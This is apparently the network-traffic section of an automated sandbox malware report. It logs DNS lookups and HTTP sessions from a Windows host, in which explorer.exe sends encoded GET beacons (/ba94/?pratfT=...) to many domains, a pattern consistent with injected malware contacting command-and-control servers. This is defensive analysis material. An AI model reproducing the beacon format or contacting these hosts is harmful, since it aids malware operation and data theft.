                                                                                            May 3, 2024 13:18:53.295963049 CEST4977080192.168.2.4199.15.163.139
                                                                                            May 3, 2024 13:18:53.389585972 CEST8049770199.15.163.139192.168.2.4
                                                                                            May 3, 2024 13:19:52.759133101 CEST4977180192.168.2.481.19.154.98
                                                                                            May 3, 2024 13:19:52.943835020 CEST804977181.19.154.98192.168.2.4
                                                                                            May 3, 2024 13:19:52.943922997 CEST4977180192.168.2.481.19.154.98
                                                                                            May 3, 2024 13:19:52.944032907 CEST4977180192.168.2.481.19.154.98
                                                                                            May 3, 2024 13:19:53.128640890 CEST804977181.19.154.98192.168.2.4
                                                                                            May 3, 2024 13:19:53.167144060 CEST804977181.19.154.98192.168.2.4
                                                                                            May 3, 2024 13:19:53.167162895 CEST804977181.19.154.98192.168.2.4
                                                                                            May 3, 2024 13:19:53.167277098 CEST4977180192.168.2.481.19.154.98
                                                                                            May 3, 2024 13:19:53.167306900 CEST4977180192.168.2.481.19.154.98
                                                                                            May 3, 2024 13:19:53.352014065 CEST804977181.19.154.98192.168.2.4
                                                                                            May 3, 2024 13:20:54.290864944 CEST4977280192.168.2.4203.161.58.65
                                                                                            May 3, 2024 13:20:54.448736906 CEST8049772203.161.58.65192.168.2.4
                                                                                            May 3, 2024 13:20:54.448867083 CEST4977280192.168.2.4203.161.58.65
                                                                                            May 3, 2024 13:20:54.448925972 CEST4977280192.168.2.4203.161.58.65
                                                                                            May 3, 2024 13:20:54.604010105 CEST8049772203.161.58.65192.168.2.4
                                                                                            May 3, 2024 13:20:54.769840956 CEST8049772203.161.58.65192.168.2.4
                                                                                            May 3, 2024 13:20:54.769862890 CEST8049772203.161.58.65192.168.2.4
                                                                                            May 3, 2024 13:20:54.769982100 CEST4977280192.168.2.4203.161.58.65
                                                                                            May 3, 2024 13:20:54.770036936 CEST4977280192.168.2.4203.161.58.65
                                                                                            May 3, 2024 13:20:54.924649954 CEST8049772203.161.58.65192.168.2.4
                                                                                            May 3, 2024 13:21:14.858901024 CEST4977380192.168.2.481.19.154.98
                                                                                            May 3, 2024 13:21:15.043864012 CEST804977381.19.154.98192.168.2.4
                                                                                            May 3, 2024 13:21:15.043942928 CEST4977380192.168.2.481.19.154.98
                                                                                            May 3, 2024 13:21:15.044040918 CEST4977380192.168.2.481.19.154.98
                                                                                            May 3, 2024 13:21:15.228750944 CEST804977381.19.154.98192.168.2.4
                                                                                            May 3, 2024 13:21:15.259886980 CEST804977381.19.154.98192.168.2.4
                                                                                            May 3, 2024 13:21:15.259906054 CEST804977381.19.154.98192.168.2.4
                                                                                            May 3, 2024 13:21:15.260016918 CEST4977380192.168.2.481.19.154.98
                                                                                            May 3, 2024 13:21:15.260054111 CEST4977380192.168.2.481.19.154.98
                                                                                            May 3, 2024 13:21:15.444749117 CEST804977381.19.154.98192.168.2.4
                                                                                            May 3, 2024 13:21:35.327018023 CEST4977480192.168.2.489.117.27.198
                                                                                            May 3, 2024 13:21:35.663815022 CEST804977489.117.27.198192.168.2.4
                                                                                            May 3, 2024 13:21:35.663888931 CEST4977480192.168.2.489.117.27.198
                                                                                            May 3, 2024 13:21:35.663952112 CEST4977480192.168.2.489.117.27.198
                                                                                            May 3, 2024 13:21:36.000587940 CEST804977489.117.27.198192.168.2.4
                                                                                            May 3, 2024 13:21:36.000741959 CEST804977489.117.27.198192.168.2.4
                                                                                            May 3, 2024 13:21:36.001102924 CEST804977489.117.27.198192.168.2.4
                                                                                            May 3, 2024 13:21:36.001136065 CEST4977480192.168.2.489.117.27.198
                                                                                            May 3, 2024 13:21:36.009855986 CEST4977480192.168.2.489.117.27.198
                                                                                            May 3, 2024 13:21:36.338534117 CEST804977489.117.27.198192.168.2.4
                                                                                            May 3, 2024 13:21:55.754215002 CEST4977580192.168.2.43.33.130.190
                                                                                            May 3, 2024 13:21:55.842053890 CEST80497753.33.130.190192.168.2.4
                                                                                            May 3, 2024 13:21:55.842360020 CEST4977580192.168.2.43.33.130.190
                                                                                            May 3, 2024 13:21:55.842360020 CEST4977580192.168.2.43.33.130.190
                                                                                            May 3, 2024 13:21:55.930171013 CEST80497753.33.130.190192.168.2.4
                                                                                            May 3, 2024 13:21:55.938246965 CEST80497753.33.130.190192.168.2.4
                                                                                            May 3, 2024 13:21:55.938263893 CEST80497753.33.130.190192.168.2.4
                                                                                            May 3, 2024 13:21:55.938664913 CEST4977580192.168.2.43.33.130.190
                                                                                            May 3, 2024 13:21:55.938664913 CEST4977580192.168.2.43.33.130.190
                                                                                            May 3, 2024 13:21:55.949208021 CEST80497753.33.130.190192.168.2.4
                                                                                            May 3, 2024 13:21:55.955439091 CEST4977580192.168.2.43.33.130.190
                                                                                            May 3, 2024 13:21:56.026484966 CEST80497753.33.130.190192.168.2.4
                                                                                            May 3, 2024 13:22:16.374809027 CEST4977680192.168.2.4103.224.212.217
                                                                                            May 3, 2024 13:22:16.532063007 CEST8049776103.224.212.217192.168.2.4
                                                                                            May 3, 2024 13:22:16.535005093 CEST4977680192.168.2.4103.224.212.217
                                                                                            May 3, 2024 13:22:16.535005093 CEST4977680192.168.2.4103.224.212.217
                                                                                            May 3, 2024 13:22:16.733433008 CEST8049776103.224.212.217192.168.2.4
                                                                                            May 3, 2024 13:22:16.744818926 CEST8049776103.224.212.217192.168.2.4
                                                                                            May 3, 2024 13:22:16.744836092 CEST8049776103.224.212.217192.168.2.4
                                                                                            May 3, 2024 13:22:16.745022058 CEST4977680192.168.2.4103.224.212.217
                                                                                            May 3, 2024 13:22:16.745022058 CEST4977680192.168.2.4103.224.212.217
                                                                                            May 3, 2024 13:22:16.902807951 CEST8049776103.224.212.217192.168.2.4
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            May 3, 2024 13:13:15.522856951 CEST53620271.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:13:15.573331118 CEST53527981.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:13:15.858653069 CEST6303953192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:13:15.858931065 CEST5398353192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:13:15.946934938 CEST53630391.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:13:15.947072983 CEST53539831.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:13:16.272998095 CEST53550981.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:13:21.926417112 CEST138138192.168.2.4192.168.2.255
                                                                                            May 3, 2024 13:13:38.274638891 CEST53508651.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:13:57.025671005 CEST53593661.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:14:15.417614937 CEST53568081.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:14:20.010065079 CEST53611781.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:14:50.427818060 CEST53643561.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:14:56.468380928 CEST6085153192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:14:56.686219931 CEST53608511.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:15:18.342544079 CEST5256153192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:15:18.473735094 CEST53525611.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:15:38.485184908 CEST53576241.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:15:39.907567978 CEST5177153192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:15:40.486999035 CEST53517711.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:15:53.795504093 CEST5576653192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:15:54.389405012 CEST53557661.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:16:01.914570093 CEST4936053192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:16:02.311346054 CEST53493601.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:16:16.963526964 CEST5836853192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:16:17.351466894 CEST53583681.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:16:23.883230925 CEST6405153192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:16:24.304452896 CEST53640511.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:16:25.224664927 CEST6405153192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:16:25.312510967 CEST53640511.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:16:46.618767023 CEST5087653192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:16:47.098659992 CEST53508761.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:16:55.961378098 CEST53549401.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:17:08.549978971 CEST6202653192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:17:08.861557961 CEST53620261.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:17:22.567151070 CEST138138192.168.2.4192.168.2.255
                                                                                            May 3, 2024 13:17:29.065696001 CEST5285553192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:17:29.237647057 CEST53528551.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:17:49.530268908 CEST6140553192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:17:49.701128960 CEST53614051.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:18:09.967236996 CEST5184453192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:18:10.063162088 CEST53518441.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:18:30.455046892 CEST5678153192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:18:30.553987026 CEST53567811.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:18:51.003025055 CEST5222753192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:18:52.012756109 CEST5222753192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:18:53.013962984 CEST5222753192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:18:53.106049061 CEST53522271.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:19:11.238706112 CEST53588531.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:19:11.527079105 CEST5215153192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:19:11.690383911 CEST53521511.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:19:26.232754946 CEST5283053192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:19:26.387012959 CEST53528301.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:19:31.999973059 CEST5177353192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:19:32.095784903 CEST53517731.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:19:52.467185974 CEST5339053192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:19:52.758243084 CEST53533901.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:20:33.733644009 CEST4956153192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:20:33.861618042 CEST53495611.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:20:54.189124107 CEST5093453192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:20:54.289335966 CEST53509341.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:21:14.686564922 CEST6175053192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:21:14.858146906 CEST53617501.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:21:35.138412952 CEST5612853192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:21:35.326103926 CEST53561281.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:21:55.638798952 CEST6362853192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:21:55.752659082 CEST53636281.1.1.1192.168.2.4
                                                                                            May 3, 2024 13:22:16.141124964 CEST6521453192.168.2.41.1.1.1
                                                                                            May 3, 2024 13:22:16.370599031 CEST53652141.1.1.1192.168.2.4
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            May 3, 2024 13:13:15.858653069 CEST192.168.2.41.1.1.10xb854Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:13:15.858931065 CEST192.168.2.41.1.1.10x6453Standard query (0)www.google.com65IN (0x0001)false
                                                                                            May 3, 2024 13:14:56.468380928 CEST192.168.2.41.1.1.10xaa80Standard query (0)www.whatpixels.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:15:18.342544079 CEST192.168.2.41.1.1.10x75f6Standard query (0)www.jacobmcfarland.devA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:15:39.907567978 CEST192.168.2.41.1.1.10xc592Standard query (0)www.creditscorewizards.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:15:53.795504093 CEST192.168.2.41.1.1.10xa3c0Standard query (0)www.creditscorewizards.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:16:01.914570093 CEST192.168.2.41.1.1.10x8444Standard query (0)www.spesandosupermercato.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:16:16.963526964 CEST192.168.2.41.1.1.10xabf7Standard query (0)www.spesandosupermercato.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:16:23.883230925 CEST192.168.2.41.1.1.10x8c42Standard query (0)www.prismotrov.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:16:25.224664927 CEST192.168.2.41.1.1.10x8c42Standard query (0)www.prismotrov.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:16:46.618767023 CEST192.168.2.41.1.1.10xeb99Standard query (0)www.reddragondao.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:17:08.549978971 CEST192.168.2.41.1.1.10x5dStandard query (0)www.yourreicapital.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:17:29.065696001 CEST192.168.2.41.1.1.10xe494Standard query (0)www.fijula.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:17:49.530268908 CEST192.168.2.41.1.1.10x1e34Standard query (0)www.arwile.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:18:09.967236996 CEST192.168.2.41.1.1.10x5cf8Standard query (0)www.humidityflash.siteA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:18:30.455046892 CEST192.168.2.41.1.1.10x1b01Standard query (0)www.steam.helpA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:18:51.003025055 CEST192.168.2.41.1.1.10x29c5Standard query (0)www.galaxyprofituk.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:18:52.012756109 CEST192.168.2.41.1.1.10x29c5Standard query (0)www.galaxyprofituk.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:18:53.013962984 CEST192.168.2.41.1.1.10x29c5Standard query (0)www.galaxyprofituk.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:19:11.527079105 CEST192.168.2.41.1.1.10x3886Standard query (0)www.yqwija.infoA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:19:26.232754946 CEST192.168.2.41.1.1.10x1d15Standard query (0)www.yqwija.infoA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:19:31.999973059 CEST192.168.2.41.1.1.10x19f9Standard query (0)www.posteo.lolA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:19:52.467185974 CEST192.168.2.41.1.1.10xb9f8Standard query (0)www.naservus.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:20:33.733644009 CEST192.168.2.41.1.1.10x6d93Standard query (0)www.fijula.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:20:54.189124107 CEST192.168.2.41.1.1.10xc5efStandard query (0)www.hjgd.xyzA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:21:14.686564922 CEST192.168.2.41.1.1.10x4309Standard query (0)www.naservus.comA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:21:35.138412952 CEST192.168.2.41.1.1.10x5c5Standard query (0)www.dxtra.shopA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:21:55.638798952 CEST192.168.2.41.1.1.10xbf37Standard query (0)www.thesiamesebetta.bizA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:22:16.141124964 CEST192.168.2.41.1.1.10x467dStandard query (0)www.sol-casino-2023.clubA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            May 3, 2024 13:13:15.946934938 CEST1.1.1.1192.168.2.40xb854No error (0)www.google.com172.217.165.132A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:13:15.947072983 CEST1.1.1.1192.168.2.40x6453No error (0)www.google.com65IN (0x0001)false
                                                                                            May 3, 2024 13:14:56.686219931 CEST1.1.1.1192.168.2.40xaa80No error (0)www.whatpixels.com91.195.240.117A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:15:18.473735094 CEST1.1.1.1192.168.2.40x75f6No error (0)www.jacobmcfarland.devwebdevmcfarland.github.ioCNAME (Canonical name)IN (0x0001)false
                                                                                            May 3, 2024 13:15:18.473735094 CEST1.1.1.1192.168.2.40x75f6No error (0)webdevmcfarland.github.io185.199.110.153A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:15:18.473735094 CEST1.1.1.1192.168.2.40x75f6No error (0)webdevmcfarland.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:15:18.473735094 CEST1.1.1.1192.168.2.40x75f6No error (0)webdevmcfarland.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:15:18.473735094 CEST1.1.1.1192.168.2.40x75f6No error (0)webdevmcfarland.github.io185.199.108.153A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:15:40.486999035 CEST1.1.1.1192.168.2.40xc592No error (0)www.creditscorewizards.com45.43.211.76A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:15:54.389405012 CEST1.1.1.1192.168.2.40xa3c0No error (0)www.creditscorewizards.com45.43.211.76A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:16:02.311346054 CEST1.1.1.1192.168.2.40x8444No error (0)www.spesandosupermercato.com81.88.63.46A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:16:17.351466894 CEST1.1.1.1192.168.2.40xabf7No error (0)www.spesandosupermercato.com81.88.63.46A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:16:24.304452896 CEST1.1.1.1192.168.2.40x8c42No error (0)www.prismotrov.com87.236.19.19A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:16:25.312510967 CEST1.1.1.1192.168.2.40x8c42No error (0)www.prismotrov.com87.236.19.19A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:16:47.098659992 CEST1.1.1.1192.168.2.40xeb99No error (0)www.reddragondao.com185.215.4.42A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:17:08.861557961 CEST1.1.1.1192.168.2.40x5dNo error (0)www.yourreicapital.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                            May 3, 2024 13:17:08.861557961 CEST1.1.1.1192.168.2.40x5dNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:17:29.237647057 CEST1.1.1.1192.168.2.40xe494Name error (3)www.fijula.comnonenoneA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:17:49.701128960 CEST1.1.1.1192.168.2.40x1e34No error (0)www.arwile.com94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                            May 3, 2024 13:17:49.701128960 CEST1.1.1.1192.168.2.40x1e34No error (0)94950.bodis.com199.59.243.225A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:18:10.063162088 CEST1.1.1.1192.168.2.40x5cf8Name error (3)www.humidityflash.sitenonenoneA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:18:30.553987026 CEST1.1.1.1192.168.2.40x1b01Name error (3)www.steam.helpnonenoneA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:18:53.106049061 CEST1.1.1.1192.168.2.40x29c5No error (0)www.galaxyprofituk.com199.15.163.139A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:19:11.690383911 CEST1.1.1.1192.168.2.40x3886Name error (3)www.yqwija.infononenoneA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:19:26.387012959 CEST1.1.1.1192.168.2.40x1d15Name error (3)www.yqwija.infononenoneA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:19:32.095784903 CEST1.1.1.1192.168.2.40x19f9Name error (3)www.posteo.lolnonenoneA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:19:52.758243084 CEST1.1.1.1192.168.2.40xb9f8No error (0)www.naservus.com81.19.154.98A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:20:33.861618042 CEST1.1.1.1192.168.2.40x6d93Name error (3)www.fijula.comnonenoneA (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:20:54.289335966 CEST1.1.1.1192.168.2.40xc5efNo error (0)www.hjgd.xyz203.161.58.65A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:21:14.858146906 CEST1.1.1.1192.168.2.40x4309No error (0)www.naservus.com81.19.154.98A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:21:35.326103926 CEST1.1.1.1192.168.2.40x5c5No error (0)www.dxtra.shopdxtra.shopCNAME (Canonical name)IN (0x0001)false
                                                                                            May 3, 2024 13:21:35.326103926 CEST1.1.1.1192.168.2.40x5c5No error (0)dxtra.shop89.117.27.198A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:21:55.752659082 CEST1.1.1.1192.168.2.40xbf37No error (0)www.thesiamesebetta.bizthesiamesebetta.bizCNAME (Canonical name)IN (0x0001)false
                                                                                            May 3, 2024 13:21:55.752659082 CEST1.1.1.1192.168.2.40xbf37No error (0)thesiamesebetta.biz3.33.130.190A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:21:55.752659082 CEST1.1.1.1192.168.2.40xbf37No error (0)thesiamesebetta.biz15.197.148.33A (IP address)IN (0x0001)false
                                                                                            May 3, 2024 13:22:16.370599031 CEST1.1.1.1192.168.2.40x467dNo error (0)www.sol-casino-2023.club103.224.212.217A (IP address)IN (0x0001)false
                                                                                            • login.live.com
                                                                                            • www.google.com
                                                                                            • fs.microsoft.com
                                                                                            • slscr.update.microsoft.com
                                                                                            • self.events.data.microsoft.com
                                                                                            • www.whatpixels.com
                                                                                            • www.jacobmcfarland.dev
                                                                                            • www.creditscorewizards.com
                                                                                            • www.spesandosupermercato.com
                                                                                            • www.prismotrov.com
                                                                                            • www.reddragondao.com
                                                                                            • www.yourreicapital.com
                                                                                            • www.arwile.com
                                                                                            • www.galaxyprofituk.com
                                                                                            • www.naservus.com
                                                                                            • www.hjgd.xyz
                                                                                            • www.dxtra.shop
                                                                                            • www.thesiamesebetta.biz
                                                                                            • www.sol-casino-2023.club
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.44976191.195.240.117802580C:\Windows\explorer.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 3, 2024 13:14:56.862627029 CEST162OUTGET /ba94/?pratfT=w5buqW1qnQWArBBbXdLoZIvdPItXIx3uI8MAMGH64MDDUd5zbDvuP/+Tw1xYYjeEdA0w&GBZD=NXkDk HTTP/1.1
                                                                                            Host: www.whatpixels.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            May 3, 2024 13:14:57.038217068 CEST208INHTTP/1.1 403 Forbidden
                                                                                            content-length: 93
                                                                                            cache-control: no-cache
                                                                                            content-type: text/html
                                                                                            connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.449762185.199.110.153802580C:\Windows\explorer.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 3, 2024 13:15:18.562499046 CEST166OUTGET /ba94/?GBZD=NXkDk&pratfT=Syu+q7LTVVf/nnOGzM7dCSaK3EIFRvByY41DtIlwfuflJuMRpsP05mCao6H+1UHcp7rT HTTP/1.1
                                                                                            Host: www.jacobmcfarland.dev
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            May 3, 2024 13:15:18.659305096 CEST744INHTTP/1.1 301 Moved Permanently
                                                                                            Connection: close
                                                                                            Content-Length: 162
                                                                                            Server: GitHub.com
                                                                                            Content-Type: text/html
                                                                                            X-GitHub-Request-Id: 1664:2653CE:22FCAA2:29E1AF2:6634C745
                                                                                            Accept-Ranges: bytes
                                                                                            Age: 0
                                                                                            Date: Fri, 03 May 2024 11:15:18 GMT
                                                                                            Via: 1.1 varnish
                                                                                            X-Served-By: cache-ewr18139-EWR
                                                                                            X-Cache: MISS
                                                                                            X-Cache-Hits: 0
                                                                                            X-Timer: S1714734919.605851,VS0,VE9
                                                                                            Vary: Accept-Encoding
                                                                                            X-Fastly-Request-ID: 18ca0c0b5d375991e9063d1bcacb9f58d189c321
                                                                                            Location: https://jacobmcfarland.dev/ba94/?GBZD=NXkDk&pratfT=Syu+q7LTVVf/nnOGzM7dCSaK3EIFRvByY41DtIlwfuflJuMRpsP05mCao6H+1UHcp7rT
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.44976345.43.211.76802580C:\Windows\explorer.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 3, 2024 13:15:40.646435022 CEST170OUTGET /ba94/?pratfT=POE3vhqdI7+x1iYSozxeyUlQEHxbL2eD4u8iGLFDDFz01TjYFTv5SGCxWy7p8kpjGI2S&GBZD=NXkDk HTTP/1.1
                                                                                            Host: www.creditscorewizards.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            May 3, 2024 13:15:40.805722952 CEST926INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Fri, 03 May 2024 11:15:41 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 790
                                                                                            Connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e c3 b7 d6 dd ba cf d5 b9 b9 cb ce ca d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 [TRUNCATED]
